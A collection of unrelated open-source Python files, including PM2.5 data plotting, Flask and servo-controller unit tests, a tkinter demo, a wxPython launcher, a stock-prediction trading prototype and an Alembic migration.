PM_US: 美国使馆检测的PM2.5值\n\nimport os\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\nfilepath = 'data/data_pd/Beijing_PM.csv'\noutput_path = 'output'\n\n\ndata_pd = pd.read_csv(filepath)\n\nprint('数据基本信息:')\nprint(data_pd.info())\n\nyear_data = data_pd.groupby('year')\nyear_mean_data = year_data['PM_US'].mean()\nprint(year_mean_data)\n\nyear_mean_data.to_csv(os.path.join(output_path,'Beijing_year_mean.csv'))\n\nyear_mean_data.plot(kind='bar')\nplt.title('Beijing average PM')\nplt.tight_layout()\nplt.savefig(os.path.join(output_path,'Beijing_average_PM.png'))\n","repo_name":"xppppd/dataAnalyze_muggle","sub_path":"使用柱状图可视化 PM2.5数值.py","file_name":"使用柱状图可视化 PM2.5数值.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12115720848","text":"from app import create_app, db\nfrom config import Config\n\napp = create_app()\n\n\nclass TestConfig(Config):\n TESTING = True\n SQLALCHEMY_DATABASE_URI = 'sqlite://'\n\n\nclass TestUserModelCase:\n def setup(self):\n self.app = create_app(TestConfig)\n self.app_context = self.app.app_context()\n self.app_context.push()\n db.create_all()\n\n def teardown(self):\n db.session.remove()\n db.drop_all()\n self.app_context.pop()\n\n\nclass TestAPI:\n def setup(self):\n app.config['TESTING'] = True\n self.app = app.test_client()\n\n def test_get_api_endpoint(self):\n r = self.app.get('/tasks')\n print(r.json[\"status\"])\n assert r.json[\"status\"] == \"success\"\n assert r.status_code == 200\n","repo_name":"Artyko/RunningList","sub_path":"RunningList/server/app_test.py","file_name":"app_test.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11870815179","text":"from unittest.mock import Mock, patch\n\nimport pytest\n\nfrom pitop.pma.common.servo_motor_registers import (\n ServoMotorS0,\n ServoMotorSetup,\n ServoRegisterTypes,\n)\n\n\n@pytest.fixture\ndef servo_controller():\n plate_interface_patch = patch(\"pitop.pma.servo_controller.PlateInterface\")\n plate_interface_patch.start()\n\n from pitop.pma.servo_controller import ServoController\n\n yield ServoController\n\n plate_interface_patch.stop()\n\n\ndef test_constructor_success(servo_controller):\n controller = servo_controller(port=\"S0\")\n assert controller.registers == ServoMotorS0\n\n\ndef test_constructor_fails_on_incorrect_port(servo_controller):\n \"\"\"Constructor fails if providing an invalid port.\"\"\"\n with pytest.raises(Exception):\n servo_controller(port=\"invalid_port\")\n\n\ndef test_set_min_pulse_width_write(servo_controller):\n \"\"\"Registers written when setting the minimum pulse width to MCU.\"\"\"\n # create instance\n controller = servo_controller(port=\"S1\")\n # setup mock\n with patch.object(controller._mcu_device, \"write_word\") as write_word_mock:\n min_pulse_width = 500\n # test\n controller.set_min_pulse_width(min_pulse_width)\n write_word_mock.assert_called_with(\n ServoMotorSetup.REGISTER_MIN_PULSE_WIDTH,\n min_pulse_width,\n signed=False,\n little_endian=True,\n )\n\n\ndef test_set_max_pulse_width_write(servo_controller):\n \"\"\"Registers written when setting the maximum pulse width to MCU.\"\"\"\n # create instance\n controller = servo_controller(port=\"S1\")\n # setup mock\n with patch.object(controller._mcu_device, \"write_word\") as write_word_mock:\n max_pulse_width = 500\n # test\n controller.set_max_pulse_width(max_pulse_width)\n 
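# The mocked MCU device captures the resulting word write; the assertion\n        # below checks the target setup register, the raw pulse-width value, and\n        # the little-endian byte order.\n        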
write_word_mock.assert_called_with(\n ServoMotorSetup.REGISTER_MAX_PULSE_WIDTH,\n max_pulse_width,\n signed=False,\n little_endian=True,\n )\n\n\ndef test_set_pwm_frequency_read_write(servo_controller):\n \"\"\"Registers read/written when setting/reading PWM frequency to/from\n MCU.\"\"\"\n # create instance\n controller = servo_controller(port=\"S0\")\n\n pwm_frequency_value = 200\n with patch.object(controller, \"_mcu_device\") as mcu_device_mock:\n # setup r/w mocks\n write_byte_mock = mcu_device_mock.write_byte = Mock()\n read_unsigned_byte_mock = mcu_device_mock.read_unsigned_byte = Mock(\n return_value=pwm_frequency_value\n )\n\n # test\n controller.set_pwm_frequency(pwm_frequency_value)\n write_byte_mock.assert_called_with(\n ServoMotorSetup.REGISTER_PWM_FREQUENCY, pwm_frequency_value\n )\n\n assert controller.pwm_frequency() == pwm_frequency_value\n read_unsigned_byte_mock.assert_called_with(\n ServoMotorSetup.REGISTER_PWM_FREQUENCY\n )\n\n\ndef test_acceleration_mode_read_write(servo_controller):\n \"\"\"Registers read/written when setting/reading acceleration mode to/from\n MCU.\"\"\"\n # create instance\n controller = servo_controller(port=\"S0\")\n\n with patch.object(controller, \"_mcu_device\") as mcu_device_mock:\n for acceleration_mode in (0, 1):\n # setup r/w mocks\n write_byte_mock = mcu_device_mock.write_byte = Mock()\n read_unsigned_byte_mock = mcu_device_mock.read_unsigned_byte = Mock(\n return_value=acceleration_mode\n )\n\n # test\n controller.set_acceleration_mode(acceleration_mode)\n write_byte_mock.assert_called_with(\n ServoMotorS0.get(ServoRegisterTypes.ACC_MODE), acceleration_mode\n )\n\n assert controller.get_acceleration_mode() == acceleration_mode\n read_unsigned_byte_mock.assert_called_with(\n ServoMotorS0.get(ServoRegisterTypes.ACC_MODE)\n )\n\n\ndef test_acceleration_mode_fails_on_invalid_type(servo_controller):\n \"\"\"Can't set acceleration mode if provided mode has invalid type.\"\"\"\n controller = servo_controller(port=\"S0\")\n\n for acceleration_mode in (\"a\", 0.1):\n with pytest.raises(TypeError):\n controller.set_acceleration_mode(acceleration_mode)\n","repo_name":"thymjan/pi-top-Python-SDK","sub_path":"tests/test_pma_servo_controller.py","file_name":"test_pma_servo_controller.py","file_ext":"py","file_size_in_byte":4216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"27446329616","text":"from pathlib import Path\nfrom setuptools import Extension\n\nclass MesonExtension(Extension):\n \"\"\"\n An extension to be built using the Meson build system.\n This class assumes that a `meson.build` file resides in\n the root directory of the Python package sources.\n \"\"\"\n def __init__(self, name, builddir='builddir', compiledname=None):\n self.name = name\n self.builddir = builddir\n self.sourcepath = Path().resolve()\n if compiledname is None:\n self.compiledname = name.split('.')[-1]\n else:\n self.compiledname = compiledname\n super().__init__(name, [])\n","repo_name":"mjziebarth/Mebuex","sub_path":"mebuex/extension.py","file_name":"extension.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38092066396","text":"from ReIDModules.CAL.tools.eval_metrics import evaluate, evaluate_with_clothes\n# from Scripts.inference import args\n\n\ndef evalute_wrapper(dataset, distmat, q_pids, g_pids, q_camids, g_camids, q_clothes_ids, g_clothes_ids, extra_msg):\n print(\"Computing CMC and mAP \", extra_msg)\n 
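# evaluate() is expected to return the cumulative matching characteristic\n    # (CMC) curve and mean average precision (mAP) for the query/gallery\n    # distance matrix; cmc[k] is read below as top-(k+1) accuracy.\n    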
cmc, mAP = evaluate(distmat, q_pids, g_pids, q_camids, g_camids)\n    print(\"Results ---------------------------------------------------\")\n    print('top1:{:.1%} top5:{:.1%} top10:{:.1%} top20:{:.1%} mAP:{:.1%}'.format(cmc[0], cmc[4], cmc[9], cmc[19], mAP))\n    print(\"-----------------------------------------------------------\")\n    if dataset in ['ltcc', 'ccvid', 'vcclothes']:\n        print('Evaluating clothes changing with mode:SC')\n        print(\"Results ---------------------------------------------------\")\n        cmc, mAP = evaluate_with_clothes(distmat, q_pids, g_pids, q_camids, g_camids, q_clothes_ids, g_clothes_ids,\n                                         mode='SC')\n        print(\n            'top1:{:.1%} top5:{:.1%} top10:{:.1%} top20:{:.1%} mAP:{:.1%}'.format(cmc[0], cmc[4], cmc[9], cmc[19], mAP))\n        print(\"-----------------------------------------------------------\")\n\n        print('Evaluating clothes changing with mode:CC')\n        print(\"Results ---------------------------------------------------\")\n        cmc, mAP = evaluate_with_clothes(distmat, q_pids, g_pids, q_camids, g_camids, q_clothes_ids, g_clothes_ids,\n                                         mode='CC')\n        print(\n            'top1:{:.1%} top5:{:.1%} top10:{:.1%} top20:{:.1%} mAP:{:.1%}'.format(cmc[0], cmc[4], cmc[9], cmc[19], mAP))\n        print(\"-----------------------------------------------------------\")\n\n\ndef evaluate_performance_ccvid(tracks_results, alpha):\n    correct_predictions = 0\n    incorrect_predictions = 0\n    for track_prediction in tracks_results:\n        track_final_scores = track_prediction.get('final_scores')\n        track_true_id = track_prediction.get('track_id').split('_')[1]\n        predicted_id = max(track_final_scores, key=track_final_scores.get)\n        if int(track_true_id) == predicted_id:\n            correct_predictions += 1\n        else:\n            incorrect_predictions += 1\n\n    print(f'Running with alpha: {alpha}\\n'\n          f'Predicted correctly: {correct_predictions}\\n'\n          f'Predicted incorrectly: {incorrect_predictions}\\n'\n          f'Accuracy: {correct_predictions / (correct_predictions + incorrect_predictions)}\\n')\n","repo_name":"bar371/ReFace","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"52"} +{"seq_id":"6151409991","text":"def get_sum(number_list: list[int], k: int) -> str:\n    k_list = to_list_form(k)\n    number_list = number_list[::-1]\n\n    max_len = max(len(number_list), len(k_list))\n    shift = 0\n    result = []\n    for i in range(max_len):\n        first_number = number_list[i] if i < len(number_list) else 0\n        second_number = k_list[i] if i < len(k_list) else 0\n        temp = first_number + second_number + shift\n        shift = temp // 10\n        result.append(temp % 10)\n\n    if shift > 0:\n        result.append(1)\n\n    return \" \".join(str(elem).strip() for elem in result[::-1])\n\n\ndef to_list_form(number: int) -> list:\n    arr = []\n    while number != 0:\n        remainder = number % 10\n        arr.append(remainder)\n        number = number // 10\n\n    return arr\n\n\ndef read_input() -> tuple[list[int], int]:\n    n = int(input())\n    number_list = list(map(int, input().strip().split()))\n    k = int(input())\n    return number_list, k\n\n\nnumber_list, k = read_input()\nprint(get_sum(number_list, k))\n","repo_name":"RamazanPython/algs","sub_path":"sprint_1/homework/task_k/task_k.py","file_name":"task_k.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13270446393","text":"from tkinter import *\nwindow = Tk()\nwindow.title(\"2021-2학기 SW프로그래밍입문 메인과제2-1\")\nw = Canvas(window, width=500, 
height=500)\nw.pack()\nleft = 50\ntop = 50\nright = 100\nbottom = 100\n\n\nw.create_rectangle(left, top, right, bottom, fill=\"yellow\")\n\ndef movRight():\n w.delete(ALL)\n global left\n global top\n global right\n global bottom\n \n left = left + 5\n right = right + 5\n\n w.create_rectangle(left, top, right, bottom, fill=\"yellow\")\n \ndef movLeft():\n w.delete(ALL)\n global left\n global top\n global right\n global bottom\n \n left = left - 5\n right = right - 5\n \n w.create_rectangle(left, top, right, bottom, fill=\"yellow\")\n \ndef movTop():\n w.delete(ALL)\n global left\n global top\n global right\n global bottom\n \n top = top - 5\n bottom = bottom - 5\n\n w.create_rectangle(left, top, right, bottom, fill=\"yellow\")\n \ndef movBottom():\n w.delete(ALL)\n global left\n global top\n global right\n global bottom\n \n top = top + 5\n bottom = bottom + 5\n\n w.create_rectangle(left, top, right, bottom, fill=\"yellow\")\n \nButton(window, text=\"<==(좌)\", bg=\"red\",fg=\"black\",\n command=movLeft).pack(side=LEFT)\nButton(window, text=\"==>(우)\", bg=\"green\", fg=\"black\",\n command=movRight).pack(side=LEFT)\nButton(window, text=\"^(상)\", bg=\"orange\", fg=\"black\",\n command=movTop).pack(side=LEFT)\nButton(window, text=\"v(하)\", bg=\"orange\", fg=\"black\",\n command=movBottom).pack(side=LEFT)\n\n\nwindow.mainloop()\n","repo_name":"youyoung00/tkinter_create_rectangle_move","sub_path":"유신환_문제1-결과.py","file_name":"유신환_문제1-결과.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12488065269","text":"\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\nimport pandas as pd\n\ndef BarhPlot(latent_vector, full_savepath):\n \"\"\"Plot horizontal bars for absolute values of each latent vector components\"\"\"\n plt.figure(figsize=(10,20))\n plt.barh(range(latent_vector.shape[0]), latent_vector)\n plt.xlabel(\"Value\", fontsize=16)\n plt.ylabel(\"Component number\", fontsize=16)\n # plt.title(\"Latent vector components values\")\n plt.ylim(0, latent_vector.shape[0])\n plt.xticks(fontsize=16)\n plt.savefig(full_savepath, bbox_inches='tight')\n plt.close()\n\ndef CountPlot(latent_vector, savepath, eps=1e-2):\n \"\"\"Plot histogram of zero/non-zero elements for latent vector\"\"\"\n binary_vector = np.array([\"Non-zero\" if abs(value) > eps else \"Close to zero\" for value in latent_vector])\n binary_df = pd.DataFrame(columns=[\"zero_prox\"], data=binary_vector)\n ax = sns.countplot(x=\"zero_prox\", data=binary_df)\n ax.set(xlabel=\"latent vector components values\")\n ax.figure.savefig(savepath)\n plt.close(ax.figure)","repo_name":"VyatkinAlexey/Noiseless","sub_path":"visualization_utils.py","file_name":"visualization_utils.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"69845090724","text":"__author__ = 'dgraziotin'\n\"\"\"\nMain Application. 
Implements a custom stdout/stderr listener.\nClass the Main GUI.\nCoding standard: http://www.wxpython.org/codeguidelines.php\n\"\"\"\nimport sys\nimport wx\nimport wx.xrc\nimport pkg_resources\n\nimport datadeck.gui\nclass DataDeck(wx.App):\n def __init__(self, redirect=True, filename=None):\n wx.App.__init__(self, redirect, filename)\n\n def OnInit(self, ):\n if self.IsDpmInstalled():\n import datadeck.gui.main\n self.MainGUI = datadeck.gui.main.MainGUI()\n else:\n import datadeck.gui.base\n frame = datadeck.gui.base.DepCheckFrame(None)\n dependencies_file = pkg_resources.resource_filename('datadeck.res', 'MISSING_DPM.txt')\n frame.m_dependencies_tc.AppendText(open(dependencies_file).read())\n frame.SetSize(wx.Size(600,400))\n frame.Show()\n return True\n \n def IsDpmInstalled(self):\n try:\n import dpm\n return True\n except ImportError:\n return False\n\n\nclass SysOutListener:\n \n def __init__(self, wx_widget):\n self.m_wxwidget = wx_widget\n \n def write(self, string):\n sys.__stdout__.write(string)\n evt = datadeck.gui.main.WX_STDOUT(text=string)\n wx.PostEvent(self.m_wxwidget, evt)\n\n def flush(self):\n sys.__stdout__.flush()\n\ndef run_as_plugin():\n MainGUI = datadeck.gui.main.MainGUI()\n sysout_listener = SysOutListener(MainGUI.m_console_tc)\n sys.stdout = sysout_listener\n \ndef run():\n app = DataDeck(0)\n app.SetAppName(\"DataDeck\")\n if app.IsDpmInstalled():\n sysout_listener = SysOutListener(wx.GetApp().MainGUI.m_console_tc)\n sys.stdout = sysout_listener\n app.MainLoop()\n\nif __name__ == '__main__':\n run()\n\n","repo_name":"dgraziotin/datadeck","sub_path":"datadeck/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"5475055215","text":"\nimport sys\nfrom datetime import timedelta\nfrom datetime import datetime\n\nfrom dateutil.relativedelta import relativedelta\nfrom iexfinance import Stock\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom collections import deque\nimport numpy as np\nfrom numpy.lib.stride_tricks import as_strided\nimport pandas as pd\nfrom pandas.tseries.offsets import BDay\nimport pandas_datareader as pdr\n\nfrom kftools.optimizations import PortfolioOptimizer\n\n\ndef read_stock_data(symbols, start_date, end_date, provider='yahoo'):\n stocks = {}\n if not isinstance(symbols, (list, tuple,)):\n symbols = [symbols]\n if isinstance(start_date, str):\n start_date = pd.to_datetime(start_date)\n end_date = pd.to_datetime(end_date)\n for symbol in symbols:\n stocks[symbol] = pdr.DataReader(symbol, provider,\n start_date, end_date)\n stocks[symbol].drop(['Close'], axis=1, inplace=True)\n stocks[symbol].rename(str.lower, axis='columns', inplace=True)\n stocks[symbol].rename(columns={'adj close': 'close'}, inplace=True)\n stocks[symbol].index.rename('date', inplace=True)\n return stocks\n\ndef rolling_window(array, length):\n orig_shape = array.shape\n if not orig_shape:\n raise IndexError(\"Can't restride a scalar.\")\n elif orig_shape[0] <= length:\n raise IndexError(\n \"Can't restride array of shape {shape} with\"\n \" a window length of {len}\".format(\n shape=orig_shape,\n len=length,\n )\n )\n\n num_windows = (orig_shape[0] - length + 1)\n new_shape = (num_windows, length) + orig_shape[1:]\n\n new_strides = (array.strides[0],) + array.strides\n\n return as_strided(array, new_shape, new_strides)\n\n\nclass Factor(object):\n\n def __init__(self, data, 
window_length=15, inputs='close', preserve_data=False):\n \"\"\"\n window_length :\n Length of the lookback window over which to compute factor.\n \"\"\"\n if preserve_data:\n self.data = data\n else:\n self.data = data[inputs].sort_index(ascending=True).tail(window_length)\n\n @classmethod\n def exponential_weights(cls, length, decay_rate):\n x = np.full(length, decay_rate, np.dtype('float64')) ** np.arange(length + 1, 1, -1)\n return x\n\n\nclass Returns(Factor):\n \"\"\"\n Calculates the percent change in close price over the given window_length\n \"\"\"\n def compute(self):\n out = (self.data[-1] - self.data[0]) / self.data[0]\n return out\n\n\nclass RSI(Factor):\n \"\"\"\n Relative Strength Index\n \"\"\"\n def compute(self):\n diffs = np.diff(self.data, axis=0)\n ups = np.nanmean(np.clip(diffs, 0, np.inf), axis=0)\n downs = np.abs(np.nanmean(np.clip(diffs, -np.inf, 0), axis=0))\n return 100 - (100 / (1 + (ups / downs)))\n\n\nclass MA(Factor):\n \"\"\"\n Moving Average\n \"\"\"\n def compute(self, window=10):\n return np.nanmean(self.data.rolling(window=window).mean())\n\n\nclass EWMA(Factor):\n \"\"\"\n Exponential Weighted Moving Average\n \"\"\"\n def compute(self, span=30):\n return np.nanmean(self.data.ewm(span=span).mean())\n\n\nclass BollingerBands(Factor):\n \"\"\"\n Bollinger Bands technical indicator.\n k : float\n The number of standard deviations to add or subtract to create the\n upper and lower bands.\n \"\"\"\n\n def compute(self, k=2):\n out = {}\n difference = k * np.nanstd(self.data, axis=0)\n out['middle'] = middle = np.nanmean(self.data, axis=0)\n out['upper']= middle + difference\n out['lower'] = middle - difference\n return out\n\n\nclass MACD(Factor):\n \"\"\"\n Moving Average Convergence/Divergence (MACD) Signal line\n \"\"\"\n def __init__(self, data, fast_period=12, slow_period=26, signal_period=9, inputs='close'):\n if slow_period <= fast_period:\n raise ValueError(\"'slow_period' must be greater than 'fast_period'\")\n self.fast_period = fast_period\n self.slow_period = slow_period\n self.signal_period = signal_period\n window_length = slow_period + signal_period - 1\n self.data = data[inputs].sort_index(ascending=True).tail(window_length)\n\n def _ewma(self, data, length, axis=1):\n decay_rate = 1.0 - (2.0 / (1.0 + length))\n return np.average(\n data,\n axis=axis,\n weights=Factor.exponential_weights(length, decay_rate)\n )\n\n def compute(self):\n slow_EWMA = self._ewma(\n rolling_window(self.data, self.slow_period),\n self.slow_period\n )\n fast_EWMA = self._ewma(\n rolling_window(self.data, self.fast_period)[-self.signal_period:],\n self.fast_period\n )\n macd = fast_EWMA - slow_EWMA\n return self._ewma(macd.T, self.signal_period, axis=0)\n\n\nclass Context(object):\n\n def __init__(self, portfolio=[], benchmark_symbol='SPY'):\n self.portfolio = portfolio if isinstance(portfolio, (list, tuple)) else [portfolio]\n self.technical_indicator_states = {}\n self.window_length = 7 # Number of data points to collect before updating train collections\n self.benchmark = deque(maxlen=self.window_length)\n self.benchmark_symbol = benchmark_symbol\n self.features = ['RSI','EMA','MACD','SMA_5','SMA_10','bb_lower','bb_middle','bb_upper']\n self.response = ['Class']\n self.X = pd.DataFrame(columns=self.features) # X train data\n self.Y = pd.DataFrame(columns=self.response) # Y train data\n self.prediction = {} # Stores most recent prediction\n self.day_counter = 0\n self.position_adjustment_days = 5 # Number of days to wait before adjusting positions\n 
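# Bounds on the accumulated training set: the classifier is only fit once\n        # at least min_data_points rows are available, and the oldest rows are\n        # purged once max_data_points is exceeded (see _rebalance).\n        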
self.min_data_points = 500\n self.max_data_points = 1500\n self.total_buy = 0\n self.positions = []\n self.data = {}\n self.benchmark_data = {}\n self.output = None\n self.today = pd.to_datetime((pd.datetime.today() - BDay(1)).strftime('%Y-%m-%d'))\n self.classifier = DecisionTreeClassifier(max_depth=5, max_leaf_nodes=10)\n\n def _add_data_for_symbol(self, symbol, container, range, provider):\n if provider == 'iex':\n data = Stock(symbol).get_chart(range='{}y'.format(range))\n if not data:\n raise RuntimeError('Unable to get data from IEX for symbol {} and {} range'.format(symbol, range))\n container[symbol] = pd.DataFrame.from_dict(data)\n container[symbol]['date'] = pd.to_datetime(container[symbol]['date'])\n container[symbol].reset_index(drop=True, inplace=True)\n container[symbol] = container[symbol].set_index('date')\n else:\n start_date = (datetime.today() - relativedelta(years=range)).strftime('%Y-%m-%d')\n end_date = datetime.today().strftime('%Y-%m-%d')\n stocks = read_stock_data(symbol, start_date, end_date, provider=provider)\n container[symbol] = stocks[symbol]\n\n def _load_portfolio_data(self, provider='iex', range=5):\n for symbol in self.portfolio:\n self._add_data_for_symbol(symbol, self.data, range, provider)\n self._add_data_for_symbol(self.benchmark_symbol, self.benchmark_data, range, provider)\n\n @property\n def _adjust_position(self):\n return True if self.day_counter % self.position_adjustment_days == 0 else False\n\n def _increment_current_day(self, end_date):\n end = end_date.strftime('%Y-%m-%d')\n\n try:\n iloc = self.benchmark_data[self.benchmark_symbol].index.get_loc(end)\n except KeyError:\n return False\n\n stop = self.benchmark_data[self.benchmark_symbol].index[iloc]\n prev = stop if iloc == 0 else self.benchmark_data[self.benchmark_symbol].index[iloc - 1]\n next = stop if iloc == self.benchmark_data[self.benchmark_symbol].index.size - 1 else \\\n self.benchmark_data[self.benchmark_symbol].index[iloc + 1]\n\n self.today = stop\n self.day_counter += 1\n\n return True\n\n def _add_to_portfolio(self, prediction_array):\n # Note: We should be able to run prediction_array > 0 condition\n return True if prediction_array.size == 1 and prediction_array[0] else False\n\n def _get_current_price_for_symbol(self, symbol, column='open'):\n # TODO: This fn needs to get 1h data\n if symbol in self.data:\n return self.data[symbol].loc[self.today][column]\n if symbol in self.benchmark_data:\n return self.benchmark_data[symbol].loc[self.today][column]\n return None\n\n def _get_history(self, symbols=None, column='close', days=30, frequency='1d'):\n data = pd.DataFrame()\n end = self.today.strftime('%Y-%m-%d')\n symbols = symbols if isinstance(symbols, (list, tuple)) else [symbols]\n for symbol in symbols:\n if symbol in self.data:\n iloc = self.data[symbol].index.get_loc(end)\n start = self.data[symbol].index[iloc - days].strftime('%Y-%m-%d')\n data[symbol] = self.data[symbol][start:end][column]\n return data\n\n def _load_state(self, start_date, end_date):\n data = []\n index = ['Name']\n returns = ['returns_5']\n\n start = start_date.strftime('%Y-%m-%d')\n end = end_date.strftime('%Y-%m-%d')\n\n for key, value in self.data.items():\n features = {key: 0.0 if key not in index else '' for key in index + self.features + returns}\n features['Name'] = key\n features['SMA_5'] = MA(value.loc[start:end], window_length=5).compute(window=5)\n features['SMA_10'] = MA(value.loc[start:end], window_length=10).compute(window=10)\n features['EMA'] = EWMA(value.loc[start:end], 
window_length=30).compute(span=30)\n features['RSI'] = RSI(value.loc[start:end], window_length=15).compute()\n features['MACD'] = MACD(value.loc[start:end]).compute()\n bb = BollingerBands(value.loc[start:end], window_length=20).compute(k=2)\n features['bb_lower'] = bb['lower']\n features['bb_middle'] = bb['middle']\n features['bb_upper'] = bb['upper']\n features['returns_5'] = Returns(value.loc[start:end], window_length=5).compute()\n\n data.append(features)\n\n self.output = pd.DataFrame(data, columns=index + self.features + returns)\n self.output.reset_index(drop=True, inplace=True)\n self.output = self.output.set_index(index[0])\n self.output = self.output.dropna()\n\n def _is_benchamrk_ready(self):\n return True if len(self.benchmark) == self.benchmark.maxlen else False\n\n def _is_symbol_ready(self, symbol):\n return True if len(self.technical_indicator_states[symbol].index) == self.window_length else False\n\n def _rebalance(self):\n for symbol, _ in self.output.iterrows():\n if symbol in self.technical_indicator_states:\n self.technical_indicator_states[symbol] = self.technical_indicator_states[symbol].append(\n self.output.loc[symbol], ignore_index=True)\n else:\n self.technical_indicator_states[symbol] = pd.DataFrame(\n self.output.loc[symbol]).transpose()\n\n self.benchmark.append(self._get_current_price_for_symbol(self.benchmark_symbol, 'open'))\n\n # Wait till we accumulate enough data inside of the benchmark collection\n if self._is_benchamrk_ready():\n\n # Calculate Benchmark return\n # benchmark = (self.benchmark[-1] - self.benchmark[0]) / self.benchmark[0]\n benchmark = Returns(self.benchmark, preserve_data=True).compute()\n symbol_X_tests = {}\n\n for symbol, _ in self.output.iterrows():\n # Make sure there is enough data in for the symbol\n if self._is_symbol_ready(symbol):\n # Take the last return and check if it beat benchmark\n returns_5 = self.technical_indicator_states[symbol].iloc[-1]['returns_5']\n change = returns_5 > benchmark and returns_5 > 0\n\n Y_train = {}\n Y_train['Class'] = change\n\n # Load X train data from the 1st row\n X_train = {}\n for column in self.technical_indicator_states[symbol].columns:\n if column in self.features:\n X_train[column] = self.technical_indicator_states[symbol].iloc[0][column]\n\n self.X = self.X.append([X_train], ignore_index=True)\n self.Y = self.Y.append([Y_train], ignore_index=True)\n\n # Load X test data from the latest row\n symbol_test = {}\n for column in self.technical_indicator_states[symbol].columns:\n if column in self.features:\n symbol_test[column] = self.technical_indicator_states[symbol].iloc[-1][column]\n\n symbol_X_tests[symbol] = symbol_test\n\n # Purge 1st row\n self.technical_indicator_states[symbol] = self.technical_indicator_states[symbol].iloc[1:]\n\n # There needs to be enough data points to make a good model and adjust positions once per 5 days\n if len(self.X.index) >= self.min_data_points and self._adjust_position:\n\n # Purge data if we reach max number of endpoints (do we have to to this?)\n if len(self.X.index) > self.max_data_points:\n self.X = self.X.iloc[self.min_data_points:]\n self.Y = self.Y.iloc[self.min_data_points:]\n\n self.Y[self.response] = self.Y[self.response].astype('bool')\n self.classifier.fit(self.X[self.features].values, self.Y[self.response].values) # Generate the model\n\n self.total_buy = 0\n for symbol, _ in self.output.iterrows():\n if symbol in symbol_X_tests:\n X_test = pd.DataFrame(columns=self.features)\n X_test = X_test.append(symbol_X_tests[symbol], 
ignore_index=True)\n                        self.prediction[symbol] = self.classifier.predict(X_test)\n                        self.total_buy += 1 if self.prediction[symbol][0] else 0\n\n                position_symbols = []\n                for symbol, _ in self.output.iterrows():\n                    if symbol in self.prediction:\n                        if self._add_to_portfolio(self.prediction[symbol]):\n                            position_symbols.append(symbol)\n                        else:\n                            print(\"SELL - order_target_percent(\", symbol, \", 0)\")\n\n                if self.total_buy != 0:\n                    self.positions = self._get_history(position_symbols, 'close', 30, '1d')\n                    weights1 = PortfolioOptimizer.optimize_weights1(self.positions)\n                    self.positions = self._get_history(position_symbols, 'close', 100, '1d')\n                    weights2, _, _ = PortfolioOptimizer.optimize_weights2(self.positions)\n                    for symbol in weights1.keys():\n                        print(\"BUY - order_target_percent(\", symbol, weights1[symbol], \")\")\n\n\ndef main():\n    n = 150\n    # from_date = pd.to_datetime('2015-10-01') + BDay(1)\n    from_date = pd.to_datetime('2017-11-01') + BDay(1)\n    # to_date = pd.to_datetime('2015-12-30') + BDay(1)\n    to_date = pd.to_datetime('2018-01-30') + BDay(1)\n    # context = Context(portfolio=['AAPL', 'ADSK', 'ADBE', 'ADI', 'AMAT', 'AMD', 'APH', 'ARW', 'AVT', 'MSFT', 'INTC', 'AMZN', 'GOOG'])\n    context = Context(portfolio=['IBM', 'SBUX', 'XOM', 'AAPL', 'MSFT', 'TLT', 'SHY', 'CVS', 'AMZN', 'GOOG', 'AMD'])\n    context._load_portfolio_data(provider='yahoo')\n    for i in range(n):\n        if context._increment_current_day(to_date):\n            context._load_state(from_date, to_date)\n            context._rebalance()\n        to_date = pd.to_datetime(to_date.to_pydatetime() + BDay(1))\n        from_date = pd.to_datetime(from_date.to_pydatetime() + BDay(1))\n        print(\"Processing dates from\", from_date, \"to\", to_date)\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"kafana/thinkering","sub_path":"trading/kftools/concepts/ml2.py","file_name":"ml2.py","file_ext":"py","file_size_in_byte":16350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70023159845","text":"\"\"\"listdb table\n\nRevision ID: 6bd3e2ecaf38\nRevises: d8e4913bf112\nCreate Date: 2018-11-01 21:31:33.333132\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '6bd3e2ecaf38'\ndown_revision = 'd8e4913bf112'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.create_table('listdb',\n    sa.Column('id', sa.Integer(), nullable=False),\n    sa.Column('user_id', sa.Integer(), nullable=True),\n    sa.Column('list_name', sa.String(length=100), nullable=True),\n    sa.Column('file_name', sa.String(length=300), nullable=True),\n    sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),\n    sa.PrimaryKeyConstraint('id')\n    )\n    # ### end Alembic commands ###\n\n\ndef downgrade():\n    # ### commands auto generated by Alembic - please adjust! 
